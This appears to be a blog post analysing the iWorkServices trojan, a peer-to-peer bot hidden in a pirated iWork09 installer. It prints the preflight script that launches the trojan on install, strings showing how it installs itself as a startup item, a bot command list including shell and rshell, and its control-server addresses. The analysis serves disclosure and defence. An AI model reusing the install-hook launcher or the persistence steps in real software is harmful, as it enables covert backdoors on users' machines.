Last week’s Intego trojan alert caught quite a bit of attention in the Mac community and was captured on probably every IT-News site around the world. As this might be the first really serious trojan to threat Mac OS X users, let’s go and try to analyze it.

First, this is a Universal Binary, so it affects Macs both running on Intel- and PowerPC processors.

The SHA-1 fingerprint of iworkservices is 55d754b95ab9b34bdd848300045c3e11caf67ecf.

The iWork09 package is basically a repackaged version of the iWork09 Trial download from apple.com with a serial to unlock it included. To add their trojan/backdoor to the package, they had to do some work first.

What you see is the content of the iWork09Trial.mpkg install package. Both Info.plist and iWorkTrial.dist control the behaviour of the installation process of the whole package. Sub-packages are listed here.

from the Info.plist

from the iWorkTrial.dist

Now, the iWorkServices.pkg install package contains the usual files created by Apple’s Package Maker, a pretty nifty, straightforward and GUI-based tool for creating installation packages for Mac OS X*.
*Available from within the Developer Tools.

The interesting files here are preflight, a script which is executed by the installer prior to the actual program install, and iworkservices, which is the trojan itself.

#!/bin/sh
"$1/Contents/Resources/iworkservices" &

The preflight script simply executes the trojan in a shell, where $1 is just a placeholder for the on-disk path to the install package.

Now comes the interesting part. Running otool revealed that it’s not an Objective-C, but a C/C++ program. Furthermore, running strings on iworkservices yields some details of the trojan’s behaviour.


__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
/usr/lib/libSystem.B.dylib
__cxa_atexit
__cxa_finalize
atexit
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices
cp %s %s
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices
Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None";
#!/bin/sh
/usr/bin/iWorkServices &
iWorkServices
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
PANIC: unprotected error in call to Lua API (%s)
[...]
excerpt from the output of strings, see full output here

As you can see, it first copies itself to /System/Library/StartupItems/iWorkServices and /usr/bin/iWorkServices, creates a StartupParameters.plist configuration file, sets rwxr-xr-x permissions on the executeable and finally runs itself from within /usr/bin/iWorkServices. Note the Requires = (“Network”); line in the configuration file which means the Startup Item will be launched by launchd when network connection is available.

As some people already found out, this trojan is actually a bot program. The commands which your bot may receive from the master server are listed below.

socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
p2pnodes

So this looks like it’s a Peer-to-Peer botnet. When started, it connects to the master server(s) serving at 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024 using HTTP and downloads a list of all other p2p nodes to /tmp/.iWorkServices.

GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X

http://

Right after that it’ll go to sleep until it receives commands from the master server.

What’s also interesting is the mentioning of the Lua API.
PANIC: unprotected error in call to Lua API (%s)
Lua is powerful but yet small embeddable scripting language. It seems the bad guys are making their life easier, too.

Disassembling the whole trojan gave about 43,000 lines of code, but this probably includes the Lua API set. If someone has left some spare time, grab the code here.

According to Intego, as of 22., Jan 20,000 people already downloaded this pirated copy. So we have a botnet of 20,000+ Macs supposedly already running DDOS attacks against some sites using a PHP script.

If anyone is investigating this botnet a little further, please let me know.
Thanks go to Methusela Cebrian Ferrer from iThreats for the initial sight into the trojan.